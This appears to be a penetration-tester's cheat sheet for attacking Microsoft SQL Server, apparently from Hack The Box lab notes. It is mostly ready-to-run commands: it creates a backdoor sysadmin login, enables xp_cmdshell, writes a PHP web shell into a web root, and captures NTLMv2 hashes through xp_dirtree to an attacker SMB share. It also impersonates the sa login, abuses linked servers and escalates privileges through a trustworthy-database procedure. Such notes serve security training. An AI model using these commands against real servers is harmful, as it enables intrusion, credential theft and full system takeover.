[1433] MSSQL
dbeaver GUI
To install dbeaver using a Debian package we can download the release .deb package from https://github.com/dbeaver/dbeaver/releases and execute the following command:
Intrusionz3r0X@htb[/htb]$ sudo dpkg -i dbeaver-<version>.deb]
Intrusionz3r0X@htb[/htb]$ dbeaver &MSSQL default system schemas/databases:
master- keeps the information for an instance of SQL Server.msdb- used by SQL Server Agent.model- a template database copied for each new database.resource- a read-only database that keeps system objects visible in every database on the server in sys schema.tempdb- keeps temporary objects for SQL queries.
Basic Enumeration
# Get version
select @@version;
# Get user
select user_name();
# Get databases
SELECT name FROM master.dbo.sysdatabases;
# Use database
USE master
#Get table names
SELECT * FROM <databaseName>.INFORMATION_SCHEMA.TABLES;
#List Linked Servers
EXEC sp_linkedservers
SELECT * FROM sys.servers;
#List users
select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name;
#Create user with sysadmin privs
CREATE LOGIN hacker WITH PASSWORD = 'P@ssword123!'
EXEC sp_addsrvrolemember 'hacker', 'sysadmin'
#Get Servername
select @@servername
#Enumerate links
enum_links
#Use a link
use_link [NAME]MSSQLPWNER tool
mssqlpwner internal.zsm.local/'mssql_svc'@192.168.210.19 -windows-auth interactive
Advance Enumeration and techniques
#Enumeration MSSQL by using nmap
Intrusionz3r0X@htb[/htb]$ sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.129.201.248
#Metasploit enumeration.
auxiliary/scanner/mssql/mssql_ping
#Interact with MSSQL
Intrusionz3r0X@htb[/htb]$ impacket-mssqlclient Administrator@10.129.201.248 -windows-auth
Intrusionz3r0X@htb[/htb]$ impacket-mssqlclient [-db volume] <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>
Intrusionz3r0X@htb[/htb]$ impacket-mssqlclient [-db volume] -windows-auth <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>
# Using sqsh (sqsh If you are on linux)
Intrusionz3r0X@htb[/htb]$ sqsh -S <IP> -U <Username> -P <Password> -D <Database>
## In case Windows Auth using "." as domain name for local user
Intrusionz3r0X@htb[/htb]$ sqsh -S <IP> -U .\\<Username> -P <Password> -D <Database>
Intrusionz3r0X@htb[/htb]$ sqsh -S 10.129.203.7 -U .\\julio -P 'MyPassword!'
## In sqsh you need to use GO after writting the query to send it
1> select 1;
2> go
## MYSQL (Port: 3306)
#Windows (SQLCMD if you are on Windows)
C:\htb> sqlcmd -S 10.129.20.13 -U username -P Password123
C:\htb> sqlcmd -S SRVMSSQL -U julio -P 'MyPassword!' -y 30 -Y 30Enable XP_CMDSHELL
#How to enable XP_CMDSHELL
EXECUTE sp_configure 'show advanced options', 1
RECONFIGURE
EXECUTE sp_configure 'xp_cmdshell', 1
RECONFIGUREWrite Files
#Enable Ole automation to allow us write files
1> sp_configure 'show advanced options', 1
2> GO
3> RECONFIGURE
4> GO
5> sp_configure 'Ole Automation Procedures', 1
6> GO
7> RECONFIGURE
8> GO
#Create file
1> DECLARE @OLE INT
2> DECLARE @FileID INT
3> EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT
4> EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1
5> EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>'
6> EXECUTE sp_OADestroy @FileID
7> EXECUTE sp_OADestroy @OLE
8> GORead Local Files
#Read Local Files in MSSQL
1> EXECUTE('SELECT * FROM OPENROWSET(BULK N''C:\\Windows\\System32\\drivers\\etc\\hosts'', SINGLE_CLOB) AS Contents') AT [LOCAL.TEST.LINKED.SRV];
2> GOCapture NTLMv2 Hash
#Capture NTLMv2 through the MSSQL by using xp_dirtree
# 1. Start SMB Server
Intrusionz3r0X@htb[/htb]$ sudo responder -I tun0
Intrusionz3r0X@htb[/htb]$ sudo impacket-smbserver share ./ -smb2support
#2. Use the desire method
1> EXEC master..xp_dirtree '\\10.10.110.17\share\'
2> GO
#Capture NTLMv2 through the MSSQL by using xp_subdirs
1> EXEC master..xp_subdirs '\\10.10.110.17\share\"
2> GOImpersonate Users
#----------Impersonate Existing Users with MSSQL----------
1> USE master
2> GO
#Identify Users that We Can Impersonate
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
1> SELECT distinct b.name
2> FROM sys.server_permissions a
3> INNER JOIN sys.server_principals b
4> ON a.grantor_principal_id = b.principal_id
5> WHERE a.permission_name = 'IMPERSONATE'
6> GO
#Verifying our Current User and Role (0:Non-SysAdmin 1:SysAdmin)
1> SELECT SYSTEM_USER
2> SELECT IS_SRVROLEMEMBER('sysadmin')
3> go
#Impersonating the SA User
1> EXECUTE AS LOGIN = 'sa'
2> SELECT SYSTEM_USER
3> SELECT IS_SRVROLEMEMBER('sysadmin')
4> GOLinked Servers exploitation on MSSQL
#Communicate with Other Databases with MSSQL using a Linked servers
#remote server [1]
#linked server. [0]
#Identify linked Servers in MSSQL
1> SELECT srvname, isremote FROM sysservers
2> GO
#Execute command in linked server.
1> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS]
2> GOCross Forest SQL Server Links Abuse
#Enumerate SQL Server Links
PS C:\Tools> import-module .\PowerUpSQL.ps1
PS C:\Tools> Get-SQLServerLink
#Enumerate Logins righs for Jimmy
PS C:\Tools> Get-SQLQuery -Query "EXEC sp_helplinkedsrvlogin"Exploitation on Windows
#verify if the current user has SA admins rights on linked server (1:sysadmin)
select * from openquery("SQL02\SQLEXPRESS",'select IS_SRVROLEMEMBER(''sysadmin'')')
#Enable XP_CMDSHELL
EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT "SQL02\SQLEXPRESS"
#Execute commands
EXECUTE('xp_cmdshell "whoami"') AT "SQL02\SQLEXPRESS"Exploitation on Linux
#Authenticate on MSSQL
Intrusionz3r0@htb[/htb]$ mssqlclient.py jimmy@10.129.229.188 -windows-auth
#Enumerate SQL Server Links and Login Rights
SQL (inlanefreight\jimmy guest@master)> enum_links
#User Link server
SQL (inlanefreight\jimmy guest@master)> use_link "SQL02\SQLEXPRESS"
#Enable XP_CMDSHELl
SQL >"SQL02\SQLEXPRESS" (sa dbo@master)> enable_xp_cmdshell
#Execute commands
SQL >"SQL02\SQLEXPRESS" (sa dbo@master)> xp_cmdshell whoami
Trustworthy Databases
If our user hasn't been granted remote login permissions as a sysadmin (sa), but instead has been provided public privileges as a local SQL User.we can pursue a strategy to enumerate trusted databases on the targeted linked server. Our objective would be to determine if the user holds the db_owner role for any trusted database. If such a database is identified, we can create a stored procedure to enable xp_cmdshell, ensuring it executes under the context of the OWNER, which typically would be the sa user.
Requirements
Identified a trustworthy database
Confirmed that our current user login name
Confirm our current user has db_owner privileges roles on database
Verify owner database is SA
Enumerate Trustworthy Databases
#Enumerate SQL Server Links
PS C:\Tools> import-module .\PowerUpSQL.ps1
PS C:\Tools> Get-SQLServerLink#Retrieve the login identification name
select * from openquery("SQL02\SQLEXPRESS",'select SUSER_NAME()')
#Check if we have public access rights
select * from openquery("SQL02\SQLEXPRESS",'select IS_SRVROLEMEMBER(''public'')')
select * from openquery("SQL02\SQLEXPRESS",'select IS_SRVROLEMEMBER(''sysadmin'')')
#Retrieve Databases
select * from openquery("SQL02\SQLEXPRESS",'select name FROM master.dbo.sysdatabases')
#dentify databases have trust worthy enabled (1: trustworthiness enabled)
select * from openquery("SQL02\SQLEXPRESS",'SELECT a.name,b.is_trustworthy_on FROM master..sysdatabases as a INNER JOIN sys.databases as b ON a.name=b.name;')
#Verify if our user had db_owner role
EXEC ('sp_helpuser') AT "SQL02\SQLEXPRESS"
#Verify the owner of the database (1: owner=sa)
select * from openquery("SQL02\SQLEXPRESS",'SELECT name as database_name , SUSER_NAME(owner_sid) AS owner , is_trustworthy_on AS TRUSTWORTHY from sys.databases;')Exploitation on Windows
#verify if the IS_RPC_OUT_ENABLED option is enabled.
select is_rpc_out_enabled from sys.servers where name='SQL02\SQLEXPRESS'
#Create procedure as sysadmin
EXEC ('CREATE PROCEDURE sp_escalate WITH EXECUTE AS OWNER AS EXEC sp_addsrvrolemember ''htb-dbuser'',''sysadmin''') AT "SQL02\SQLEXPRESS"
#verify the privileges of the current user once again
EXEC ('sp_escalate;SELECT IS_SRVROLEMEMBER(''sysadmin'');
SELECT SUSER_NAME()') AT "SQL02\SQLEXPRESS"
#Enable XP_CMDShell
EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT "SQL02\SQLEXPRESS"
#Execute commands:
EXECUTE('xp_cmdshell "whoami"') AT "SQL02\SQLEXPRESS"Exploitation on Linux
#Enumerate linked database
enum_links
#Use a linked server
use_link "SQL02\SQLEXPRESS"
#Enumerate Trushworthy Databases (1:enabled)
enum_db
#verify whether our currently identified user holds the db_owner role
enum_users
#Verify databases owners
SELECT name as database_name, SUSER_NAME(owner_sid) AS owner, is_trustworthy_on AS TRUSTWORTHY from sys.databases;
#Use database
USE "htb-reports"
#Create Procedure
CREATE PROCEDURE sp_escalate WITH EXECUTE AS OWNER AS EXEC sp_addsrvrolemember 'htb-dbuser','sysadmin'
#Execute Procedure
EXEC sp_escalate
#Verify the Sysadmin right on current user
SELECT is_srvrolemember('sysadmin')
#Enable XP_CMDSHELL
exec master.dbo.sp_configure "show advanced options",1;RECONFIGURE;exec master.dbo.sp_configure "xp_cmdshell", 1;RECONFIGURE;
#Execute commands
exec master..xp_cmdshell "whoami"Last updated